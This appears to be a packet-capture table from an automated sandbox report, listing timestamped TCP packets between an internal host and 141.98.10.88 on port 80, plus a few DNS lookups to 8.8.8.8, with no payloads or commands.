                                                                            Nov 7, 2024 16:51:21.409662008 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.409727097 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.409885883 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.409925938 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.409941912 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.410079002 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.410137892 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.410166979 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.410178900 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.410192966 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.410204887 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.410219908 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.410269022 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.458528042 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.458575010 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.458681107 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.514741898 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.514915943 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.514988899 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.526658058 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526702881 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526715040 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526773930 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.526900053 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526916981 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526930094 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526942015 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526953936 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.526966095 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.526982069 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.527648926 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.527674913 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.527686119 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.527704000 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.527729034 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.528134108 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.528145075 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.528156042 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.528183937 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.622030020 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.622040987 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.622288942 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.631771088 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.631846905 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.631927013 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.643990040 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644023895 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644036055 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644047976 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644061089 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644150972 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.644350052 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644376993 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644388914 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644395113 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.644408941 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644422054 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.644423008 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.644455910 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.645147085 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.645190001 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.645200968 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.645230055 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.739111900 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.739130020 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.739336014 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.748936892 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.749058962 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.749160051 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.760813951 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.760843039 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.760883093 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.760896921 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.760910988 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761087894 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.761087894 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.761097908 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761193037 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761205912 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761219978 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761233091 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.761249065 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.761733055 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761801958 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761816025 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761826992 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761838913 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.761847019 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.761876106 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.856168985 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.856215954 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.856437922 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.865890980 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.865911961 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.866034985 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.878015041 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878089905 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878103971 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878125906 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878138065 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878150940 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878277063 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.878278017 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.878278017 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.878422022 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878436089 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878451109 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878482103 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.878746986 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878771067 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878793001 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.878860950 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.878902912 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.922137022 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.922152042 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.922214985 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.922226906 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.922337055 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.922337055 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.983160019 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.983205080 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.983217955 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.983413935 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.995112896 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995291948 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995302916 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995321035 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995333910 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995347023 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995358944 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995373011 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.995479107 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.995479107 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.995479107 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.995479107 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.996119022 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.996196032 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.996207952 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.996234894 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.996634960 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.996685982 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.996695995 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.996709108 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.996737957 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.998421907 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.077605009 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.077641010 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.077653885 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.077899933 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.100361109 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.100405931 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.100418091 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.100616932 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.112673998 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112715006 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112735987 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112750053 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112762928 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112776995 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112790108 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112803936 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.112947941 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.112948895 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.112948895 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.113498926 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.113542080 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.113553047 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.113558054 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.113590956 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.113775969 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.113790035 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.113804102 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.113825083 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.194802046 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.194822073 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.194837093 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.194981098 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.218179941 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.218215942 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.218256950 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.218328953 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.229892969 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.229921103 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.229933977 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.229959011 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.229978085 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.230021000 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.230026960 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230192900 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230257034 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.230295897 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230407000 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230454922 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230468988 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230480909 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230493069 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.230528116 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.230559111 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.231093884 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.231120110 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.231132030 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.231175900 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.311810017 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.311830044 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.311844110 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.311949015 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.335381985 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.335402966 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.335417986 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.335491896 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.347013950 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347050905 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347063065 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347075939 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347090960 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347104073 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347119093 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347131968 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.347166061 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.347230911 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.347932100 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348010063 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348022938 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348088026 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.348308086 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348323107 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348378897 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.348459959 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348474026 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348488092 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.348527908 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.428850889 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.428870916 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.428884029 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.428980112 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.452451944 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.452474117 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.452486992 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.452528954 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.464591026 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.464642048 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.464657068 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.464680910 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.464679003 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.464694977 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.464709997 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.464715958 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.464725971 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.465096951 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465110064 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465123892 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465135098 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465137959 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.465150118 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465153933 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.465164900 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465187073 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.465864897 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465913057 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.465940952 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465955019 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465966940 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.465990067 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.545967102 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.545988083 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.546004057 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.546051979 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.570194960 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.570210934 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.570219040 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.570307970 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.581752062 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581785917 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581798077 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581835032 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.581886053 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581898928 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581933022 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581937075 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.581948996 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581963062 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.581983089 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.582555056 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.582568884 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.582582951 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.582596064 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.582652092 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.582988024 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.583030939 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.583048105 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.583060980 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.583074093 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.583090067 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.583559990 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.583583117 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.583595991 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.583626032 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.583643913 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.663197041 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.663225889 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.663239956 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.663328886 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.686676979 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.686697006 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.686709881 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.686716080 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.686794996 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.698503971 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698573112 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698585033 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698596001 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698609114 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698638916 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.698688984 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.698786974 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698820114 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698832035 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:22.698865891 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:22.814248085 CET4916780192.168.2.22141.98.10.88
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 7, 2024 16:50:53.184021950 CET5456253192.168.2.228.8.8.8
                                                                            Nov 7, 2024 16:50:53.200162888 CET53545628.8.8.8192.168.2.22
                                                                            Nov 7, 2024 16:50:55.358571053 CET5291753192.168.2.228.8.8.8
                                                                            Nov 7, 2024 16:50:55.369565964 CET53529178.8.8.8192.168.2.22
                                                                            Nov 7, 2024 16:50:55.385822058 CET6275153192.168.2.228.8.8.8
                                                                            Nov 7, 2024 16:50:55.396622896 CET53627518.8.8.8192.168.2.22
                                                                            Nov 7, 2024 16:51:00.374259949 CET5789353192.168.2.228.8.8.8
                                                                            Nov 7, 2024 16:51:00.381632090 CET53578938.8.8.8192.168.2.22
                                                                            Nov 7, 2024 16:51:00.393776894 CET5482153192.168.2.228.8.8.8
                                                                            Nov 7, 2024 16:51:00.409564972 CET53548218.8.8.8192.168.2.22
                                                                            Nov 7, 2024 16:51:20.153964043 CET5471953192.168.2.228.8.8.8
                                                                            Nov 7, 2024 16:51:20.165888071 CET53547198.8.8.8192.168.2.22
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
